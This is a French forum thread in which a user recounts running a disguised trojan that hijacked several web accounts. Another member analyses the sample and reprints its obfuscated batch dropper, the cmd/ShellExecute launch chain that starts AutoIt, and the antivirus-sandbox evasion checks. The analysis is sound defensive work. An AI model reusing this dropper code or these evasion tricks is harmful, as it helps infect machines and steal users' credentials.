[RÉSOLU] Infecté par un virus

[ThiWeb]

Bonjour à tous,

Les cordonniers sont les plus mal chaussés parait-il...

J'ai donc téléchargé une saloperie, et comme il se doit, je cherche à la lancer dans le Bac à Sable de Windows (Windows Sandbox).
Or, ce dernier m'affiche un message d'erreur :
"Échec de l'initialisation du Bac à sable Windows.
Acun hyperviseur n'est présent sur ce système. (0xC0351000)"

Bref, n'ayant pas trop de temps, je laisse le virus de côté...
Ce dernier a la forme d'un dossier Windows... mal fait.

Quoiqu'il en soit, le temps passe, et la fatigue n'aidant pas... j'ouvre le dossier qui est un exécutable... Sur MA machine
Un fichier de 800 Mo qui tourne...
Je me rends compte de ma connerie, je kill tout... mais trop tard...

Mon compte Insta se retrouve compromis.
Changement de mot de passe et résolu.
Mon compte Discord envoi de la merde à pleins de contacts.
Changement de mot de passe et résolu.
Mon compte Amazon commande de la merde.
Amazon repère le problème et bloque les commandes.
Changement de mot de passe et résolu.

De mon côté, je lance un scan Malwarebytes qui me trouve plein de saloperies dans la base de registre.
Je vire tout et... normalement, tout est rentré dans l'ordre.

Mais... on ne sait jamais !
Et je fais appel aux connaisseurs pour analyser cette daube que voici :

==>> !!! ATTENTION VIRUS !!! <==

Merci d'avance pour vos analyses.

P.S. : A la base, le fichier était protégé par un mot de passe.
Windows Defender n'a rien détecté à la décompression.
Mais lorsque j'ai envoyé et retéléchargé mon fichier .7Z sans mot de passe cette fois, Windows Defender m'a détecté ceci :
Trojan:Win32/Peardis.BA

ThiWeb

[Barca]

@Thiweb
Malwarebytes ne l'a pas détecté ?

[Cosmos0059280]

Bonjour @Thiweb
va sur le site de Kaspersky,
il y a quelques utilitaires gratuits pour nettoyer
dis nous Quoi ensuite
a+

[ThiWeb]

@Barca : Si, pleins de reg.
Mais pas de fichiers en particulier.

Merci Cosmos0059280. Je suis en train de lancer un scan avec "Kaspersky Virus Removal Tool".
A voir si il détecte encore des trucs après la suppression des REG de Malwarebytes
Dans le cas contraire, ça voudra dire qu'il n'y a plus rien.

Même si mon compte FB s'est fait piraté ce matin.
Mais toujours rien de grave. Juste un bot qui envoie des chat's à tout le monde.
MDP changé et roule ma poule.

Quoiqu'il en soit, faut juste que ça s'arrête et que je m'assure que tout est clean.
Le pire aurait été un CryptoLocker. Mais j'ai un œil sur mes synchro et mes fichiers ne bougent pas.
Je pense donc que c'est juste une virus "social" qui a pour but de tenter de prendre le contrôle des réseaux sociaux.
Manque de bol, tout est tellement protégé, que tu peux faire joujour à envoyer des messages à la con à tout le monde.
Mais prendre la propriété de mes comptes, sans Authenticator, impossible.

Bref, très chiant... mais pas très grave au final.

EDIT :
Résultat du scan de "Kaspersky Virus Removal Tool" :



RAS. Malwarebytes a donc fait le job

ThiWeb

[nenyp]

Bon ben c'est RESOLU, chef

[Barca]

Malwarebytes fait toujours le job, parfois un peu trop sensible.
Il n'a pas hurlé et bloqué quand les reg se sont installés ?

[ThiWeb]

Non non, j'ai pas Malwarebytes en permanence.
Je ne l'utilise qu'une fois tous les 10 ans en cas de besoin.
Mais il a bien fait le job après le scan.

J'ai refait un scan de tous les fichiers avec "Kaspersky Virus Removal Tool".
Aucun mauvais résultat.
J'ai également fait un sfc /scannow
Intégrité des fichiers système corrompus et corrigés.
Bref, tout semble ok maintenant.

A voir sur le court/moyen terme.

Merci à tous pour votre temps.

ThiWeb

[Barca]

A part au démarrage, ou il est très actif pendant quelques minutes, il ne prend pas beaucoup de % de temps processeur. Il trouve les problèmes avant Norton (ou defender sur les postes qui l'ont).

[ThiWeb]

Il trouve les problèmes avant Norton

Norton lol...
Je pensais que cette daube était déjà morte depuis plus de 10 ans

ThiWeb

[Barca]

Fonctionnait encore pas trop mal jusqu'à la dernière mise à jour qui essaie de me vendre d'autres logiciels. Coté détection, fonctionne pas mal, mais est surpassé par Malwarebytes. J'ai un abo bon marché pour 20 postes, alors je garde, mais j'hésite pour mon poste principal à rester sur defender uniquement avec WFC comme firewall contrôle qui marche bien sur une bonne moitié des postes que je contrôle. Mais quand on flirte avec les cerises quotidiennement, je trouve defender seul un peu trop léger même avec defender UI pour le régler.

[ThiWeb]

Ce qui m'étonne, c'est que Defender considère que le .7Z est vérolé...
Mais une fois décompressé, le fichier .EXE ? Non non... Aucun problème

Mais bordel... Si t'es capable de savoir qu'il y a un virus dans un fichier compressé...
Pourquoi tu vires pas direct le fichier .EXE qui est forcément virussé ?...
La logique absurde du truc...

Après... Le fichier .EXE fait 800 Mo contre 11 Mo pour le compressé...
C'est peut-être ce qui explique cela...

Quoiqu'il en soit... Content d'avoir proprement et rapidement résolu mon problème.
J'attends que mon compte X ou eBay ou encore d'autres sites se fassent pirater.
Mais pour l'instant, c'est très calme...

Et concernant mon problème de Sandbox, c'est également résolu.
Mon BIOS était reparti à zéro sans raison... Et du coup, la virtualisation était désactivée...
J'ai réactivé, et c'est reparti.

J'en ai profité aussi pour lancer le virus dedans...
Aucun signe... Il est très silencieux... Et finalement bien conçu...

ThiWeb

[Cosmos0059280]

re Bonjour @Thiweb
regarde aussi avec ZHP Cleaner ce qu'il te dira ... dès fois ....
mais avec une sauvegarde auparavant, j'ai remarqué qu'il est parfois brutal .

bonne soirée

[Barca]

Unhackme peut aussi trouver des roorkits/malwares et autre saloperie qui passent en dessous des scanners de virus normaux.
https://greatis.com/unhackme/index.html

[LaDidi21]

@Thiweb :
auto keyboard presser v1 9 full version free high quality.7z contient auto keyboard presser v1 9 full version free high quality.exe
auto keyboard presser v1 9 full version free high quality.exe est un "Nullsoft PiMP Stub -> SFX" :

• PE Size = 53.50 KB (54784 bytes)
• Files Size = 805.05 MB (844159077 bytes)

  Code : Tout sélectionner

   ...
  00010A00  04 00 00 00 EF BE AD DE 4E 75 6C 6C 73 6F 66 74  ...ï¾­ÞNullsoft
  00010A10  49 6E 73 74 BC 69 00 00 0E C9 0F 00 1F 0B 00 80  Inst¼i..É..€
  00010A20  5D 00 00 80 00 00 40 00 30 05 80 18 03 01 56 B3  ]..€..@.0€V³
  ...

la structure des sections est "bizarre" :

• .rsrc, RawAddress=0000A000, RawSize=00005A00 => [A000..F9FF]
• .reloc, RawAddress=0000C600, RawSize=00001000 => [C600..D5FF]

=> recouvrement !

Son code :

Code : Tout sélectionner

...
004021EC | 23C7                           | and eax,edi                                                             | eax:L"open", edi:L"/c expand Britannica.mid Britannica.mid.bat & Britannica.mid.bat"
004021EE | 68 B0B04C00                    | push auto keyboard presser v1 9 full version free high quality.4CB0B0   | 4CB0B0:L"C:\\Users\\Nous\\AppData\\Local\\Temp"
004021F3 | 50                             | push eax                                                                | eax:L"open"
004021F4 | 0FB706                         | movzx eax,word ptr ds:[esi]                                             | eax:L"open", esi:L"open"
004021F7 | F7D8                           | neg eax                                                                 | eax:L"open"
004021F9 | 1BC0                           | sbb eax,eax                                                             | eax:L"open"
004021FB | 53                             | push ebx                                                                | ebx:L"C:\\Windows\\system32\\cmd.exe"
004021FC | 23C6                           | and eax,esi                                                             | eax:L"open", esi:L"open"
004021FE | 50                             | push eax                                                                | eax:L"open"
004021FF | FF75 F4                        | push dword ptr ss:[ebp-C]                                               |
00402202 | FF15 88814000                  | call dword ptr ds:[<ShellExecuteW>]                                     |

=> %TEMP%\Britannica.mid est celui qui infecte
%TEMP%\Glasgow.mid est un .CAB contenant divers fichiers permettant de construire l'exe/com
%TEMP%\*.mid : permettant de construire l'exe/com

Le

Code : Tout sélectionner

expand Britannica.mid Britannica.mid.bat

ne sert qu'à copier Britannica.mid en Britannica.mid.bat.
Le

Code : Tout sélectionner

& Britannica.mid.bat

l'exécute
Un petit peu de "nettoyage" du .bat :

Code : Tout sélectionner

Set Aware=w
Set Enjoying=x
Set Completion=A
Set Breaks=Z
Set Sucks=6
Set Goat=J
Set Authentication=T
Set Halfcom=L
Set Implementing=I
Set Referring=g
Set Organ=z
Set Wake=v
Set Lyrics=l
Set Mentor=1
Set Shoulder=d
Set Resume=y
Set Reflect=c
Set Turbo=t
Set Establish=s
Set Has= 
Set Removal=G
Set Male=n
Set Unless=8
Set Informal=O
Set Viewed=2
Set Exit=N
Set Recognize=M
Set Fold=a
Set Department=E
Set Lowest=5
Set Drunk=k
Set Merit=C
Set Jumping=b
Set Accompanied=P
Set Patches=f
Set Mountain=i
Set Maryland=H
Set Velocity=7
Set Samuel=Q
Set Thus=h
Set Obligation=K
Set Confirm=o
Set Gzip=S
Set Anchor=/
Set Organic=r
Set Restaurant=X
Set Reset=V
Set Reminder=4
Set Beginners=U
Set Optimize=m
Set Itsa=e
Set Norton=.
Set Film=3
Set Signing=+
%Gzip%%Itsa%%Turbo%%Has%%Thus%%Shoulder%Wj%Fold%%Accompanied%%Confirm%%Male%Y%Samuel%%Drunk%%Fold%%Establish%%Obligation%%Patches%%Organ%D%Referring%%Mountain%Y%Reflect%%Enjoying%%Mountain%%Reset%%Merit%R%Goat%%Jumping%p%Restaurant%%Mountain%W%Shoulder%%Turbo%%Resume%=D%Fold%%Organic%%Drunk%%Norton%%Reflect%%Confirm%%Optimize%
%Gzip%%Itsa%%Turbo%%Has%%Exit%%Organ%%Aware%%Referring%%Itsa%%Samuel%%Male%%Itsa%%Obligation%WR%Lyrics%jD%Jumping%%Lyrics%%Mountain%%Maryland%p%Shoulder%%Removal%%Resume%%Aware%%Referring%W%Goat%%Thus%%Accompanied%%Turbo%j%Resume%%Lyrics%%Merit%%Drunk%=%Has%
%Gzip%%Itsa%%Turbo%%Has%%Mountain%%Restaurant%%Authentication%%Referring%%Confirm%%Gzip%%Shoulder%%Obligation%%Organic%%Breaks%%Optimize%%Halfcom%%Aware%%Restaurant%%Shoulder%%Obligation%%Lyrics%%Mountain%%Referring%F%Informal%%Jumping%%Obligation%%Organic%%Lyrics%W%Recognize%u%Mountain%=%Lowest%
%Turbo%%Fold%%Establish%%Drunk%%Lyrics%%Mountain%%Establish%%Turbo%%Has%|%Has%%Patches%%Mountain%%Male%%Shoulder%%Establish%%Turbo%%Organic%%Has%%Anchor%%Implementing%%Has%"%Confirm%p%Establish%%Establish%%Wake%%Reflect%%Has%%Aware%%Organic%%Establish%%Fold%"%Has%&%Has%%Mountain%%Patches%%Has%%Male%%Confirm%%Turbo%%Has%%Itsa%%Organic%%Organic%%Confirm%%Organic%%Lyrics%%Itsa%%Wake%%Itsa%%Lyrics%%Has%%Mentor%%Has%p%Mountain%%Male%%Referring%%Has%-%Male%%Has%%Mentor%%Unless%%Velocity%%Has%%Mentor%%Viewed%%Velocity%%Norton%0%Norton%0%Norton%%Mentor%
%Gzip%%Itsa%%Turbo%%Has%%Anchor%%Fold%%Has%%Halfcom%%Confirm%%Male%%Referring%=%Lowest%%Viewed%%Unless%%Mentor%%Lowest%%Lowest%
%Turbo%%Fold%%Establish%%Drunk%%Lyrics%%Mountain%%Establish%%Turbo%%Has%|%Has%%Patches%%Mountain%%Male%%Shoulder%%Establish%%Turbo%%Organic%%Has%"%Jumping%%Shoulder%%Establish%%Itsa%%Organic%%Wake%%Mountain%%Reflect%%Itsa%%Thus%%Confirm%%Establish%%Turbo%%Has%%Completion%%Wake%%Fold%%Establish%%Turbo%%Beginners%%Implementing%%Has%%Completion%%Reset%%Removal%%Beginners%%Implementing%%Has%%Male%%Establish%W%Establish%%Reflect%%Gzip%%Wake%%Reflect%%Has%%Itsa%%Drunk%%Organic%%Male%%Has%%Gzip%%Confirm%p%Thus%%Confirm%%Establish%%Maryland%%Itsa%%Fold%%Lyrics%%Turbo%%Thus%"%Has%&%Has%%Mountain%%Patches%%Has%%Male%%Confirm%%Turbo%%Has%%Itsa%%Organic%%Organic%%Confirm%%Organic%%Lyrics%%Itsa%%Wake%%Itsa%%Lyrics%%Has%%Mentor%%Has%%Gzip%%Itsa%%Turbo%%Has%%Thus%%Shoulder%Wj%Fold%%Accompanied%%Confirm%%Male%Y%Samuel%%Drunk%%Fold%%Establish%%Obligation%%Patches%%Organ%D%Referring%%Mountain%Y%Reflect%%Enjoying%%Mountain%%Reset%%Merit%R%Goat%%Jumping%p%Restaurant%%Mountain%W%Shoulder%%Turbo%%Resume%=%Completion%u%Turbo%%Confirm%%Implementing%%Turbo%%Film%%Norton%%Itsa%%Enjoying%%Itsa%%Has%&%Has%%Gzip%%Itsa%%Turbo%%Has%%Exit%%Organ%%Aware%%Referring%%Itsa%%Samuel%%Male%%Itsa%%Obligation%WR%Lyrics%jD%Jumping%%Lyrics%%Mountain%%Maryland%p%Shoulder%%Removal%%Resume%%Aware%%Referring%W%Goat%%Thus%%Accompanied%%Turbo%j%Resume%%Lyrics%%Merit%%Drunk%=%Norton%%Fold%%Film%%Enjoying%%Has%&%Has%%Gzip%%Itsa%%Turbo%%Has%%Mountain%%Restaurant%%Authentication%%Referring%%Confirm%%Gzip%%Shoulder%%Obligation%%Organic%%Breaks%%Optimize%%Halfcom%%Aware%%Restaurant%%Shoulder%%Obligation%%Lyrics%%Mountain%%Referring%F%Informal%%Jumping%%Obligation%%Organic%%Lyrics%W%Recognize%u%Mountain%=%Film%00
%Reflect%%Optimize%%Shoulder%%Has%%Anchor%%Reflect%%Has%%Optimize%%Shoulder%%Has%%Long%
%Itsa%%Enjoying%%Turbo%%Organic%%Fold%%Reflect%%Film%%Viewed%%Has%%Anchor%Y%Has%%Anchor%%Department%%Has%%Removal%%Lyrics%%Fold%%Establish%%Referring%%Confirm%%Aware%%Norton%%Optimize%%Mountain%%Shoulder%
<%Male%u%Lyrics%%Has%%Establish%%Itsa%%Turbo%%Has%%Anchor%p%Has%="%Recognize%%Breaks%"%Has%>%Has%%Long%\%hdWjaPonYQkasKfzDgiYcxiVCRJbpXiWdty%
%Patches%%Mountain%%Male%%Shoulder%%Establish%%Turbo%%Organic%%Has%%Anchor%%Reset%%Has%"%Shoulder%%Mountain%%Fold%%Organic%%Resume%"%Has%B%Fold%%Thus%%Fold%%Optimize%%Fold%%Establish%%Has%>>%Has%%Long%\%hdWjaPonYQkasKfzDgiYcxiVCRJbpXiWdty%
%Reflect%%Optimize%%Shoulder%%Has%%Anchor%%Reflect%%Has%%Reflect%%Confirm%p%Resume%%Has%%Anchor%%Jumping%%Has%%Long%\%hdWjaPonYQkasKfzDgiYcxiVCRJbpXiWdty%%Has%%Signing%%Has%%Implementing%%Lyrics%%Lyrics%u%Establish%%Turbo%%Organic%%Fold%%Turbo%%Mountain%%Confirm%%Male%%Has%%Signing%%Has%F%Confirm%%Organic%%Referring%%Confirm%%Turbo%%Turbo%%Itsa%%Male%%Has%%Signing%%Has%%Recognize%%Mountain%%Lyrics%%Patches%%Establish%%Has%%Signing%%Has%%Maryland%%Fold%%Organic%%Jumping%%Confirm%%Organic%%Has%%Signing%%Has%%Informal%%Jumping%%Turbo%%Fold%%Mountain%%Male%%Has%%Signing%%Has%%Exit%%Itsa%%Reflect%%Itsa%%Establish%%Establish%%Fold%%Organic%%Mountain%%Lyrics%%Resume%%Has%%Signing%%Has%%Authentication%%Confirm%%Aware%%Male%%Establish%%Thus%%Mountain%p%Has%%Signing%%Has%%Merit%%Confirm%%Confirm%%Lyrics%%Mountain%%Male%%Referring%%Has%%Signing%%Has%%Department%%Fold%%Organic%%Male%%Mountain%%Male%%Referring%%Has%%Signing%%Has%%Maryland%%Fold%%Organic%%Shoulder%%Reflect%%Confirm%%Organic%%Itsa%%Has%%Long%\%hdWjaPonYQkasKfzDgiYcxiVCRJbpXiWdty%
%Reflect%%Shoulder%%Has%%Long%
%Reflect%%Optimize%%Shoulder%%Has%%Anchor%%Reflect%%Has%%Reflect%%Confirm%p%Resume%%Has%%Anchor%%Jumping%%Has%%Norton%%Norton%\D%Itsa%%Fold%%Shoulder%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\R%Confirm%%Optimize%%Fold%%Male%%Turbo%%Mountain%%Reflect%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\F%Reflect%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\B%Organic%%Mountain%%Fold%%Male%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\%Completion%%Lyrics%%Lyrics%%Fold%%Male%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\%Completion%%Organic%%Organic%%Fold%%Male%%Referring%%Itsa%%Optimize%%Itsa%%Male%%Turbo%%Establish%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\%Implementing%%Male%%Establish%u%Lyrics%%Mountain%%Male%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Signing%%Has%%Norton%%Norton%\%Authentication%%Fold%%Lyrics%%Itsa%%Male%%Turbo%%Itsa%%Shoulder%%Norton%%Optimize%%Mountain%%Shoulder%%Has%%Breaks%%NzwgeQneKWRljDbliHpdGywgWJhPtjylCk%
%Establish%%Turbo%%Fold%%Organic%%Turbo%%Has%%hdWjaPonYQkasKfzDgiYcxiVCRJbpXiWdty%%Has%%Breaks%%NzwgeQneKWRljDbliHpdGywgWJhPtjylCk%
%Reflect%%Shoulder%%Has%%Norton%%Norton%
%Reflect%%Thus%%Confirm%%Mountain%%Reflect%%Itsa%%Has%%Anchor%%Shoulder%%Has%%Resume%%Has%%Anchor%%Turbo%%Has%%iXTgoSdKrZmLwXdKligFObKrlWMui%

tout ce bazar pour générer 2 fichiers .\s28155\Dark.com et .\s28155\Z
pour lancer

Code : Tout sélectionner

start Dark.com Z

Dark.com, c'est... AutoIt3.exe
et le "Z" est le script AutoIt compilé.... à décompiler... mais je n'ai pas trouvé d'outil valable pour le décompiler et je n'ai guère envie de voir tout ce qu'il fait vu la taille (505 Ko)

Le pire c'est que je l'ai lancé, hors sandboxé, par erreur

[Joselito]

@LaDidi21,
AutoIt3, bien connu des développeurs d'Adobe-GenP.

[ThiWeb]

Le pire c'est que je l'ai lancé, hors sandboxé, par erreur

Ouai... bah comme moi
2 patates qu'on est

T'as plus qu'à changer les mot des passe de tes comptes web...

ThiWeb

[LaDidi21]

@ThiWeb :
T'inquiète : aucun ménage n'est nécessaire. hors Sandbox... mais dans une VM : pas folle la guêpe
 
L'analyse de Z est ardue.
"myAutToExe2_2" ne le décompile pas.

Il teste la présence d'avatUI.exe en mémoire
"bizarrement", il se supprime en fin !

Il teste :

• ComputerName, vis à vis de "tz" "NfZtFbPfH" "ELICZ"
• UserName, vis à vis de "test22"

Pourquoi ?
https://www.crowdstrike.com/en-us/blog/ ... hing-lure/ :

• The username is test22

https://www.usenix.org/system/files/con ... update.pdf : "

All four AVs used hardcoded computer names:

• Kaspersky - “NfZtFbPfH”;
• Bitdefender - “tz”;
• AVG - “ELICZ”

[Cosmos0059280]

bonsoir @all

une lecture (mel reçu ce jour) :
https://www.kaspersky.fr/blog/whatsapp- ... y%20digest

https://links.kaspersky.sm/v/2GG/JdmJZE ... y%20digest
a+

[LaDidi21]

@Cosmos0059280 :
Quel rapport avec le post ?

[Cosmos0059280]

le wastapp de Thiweb je pense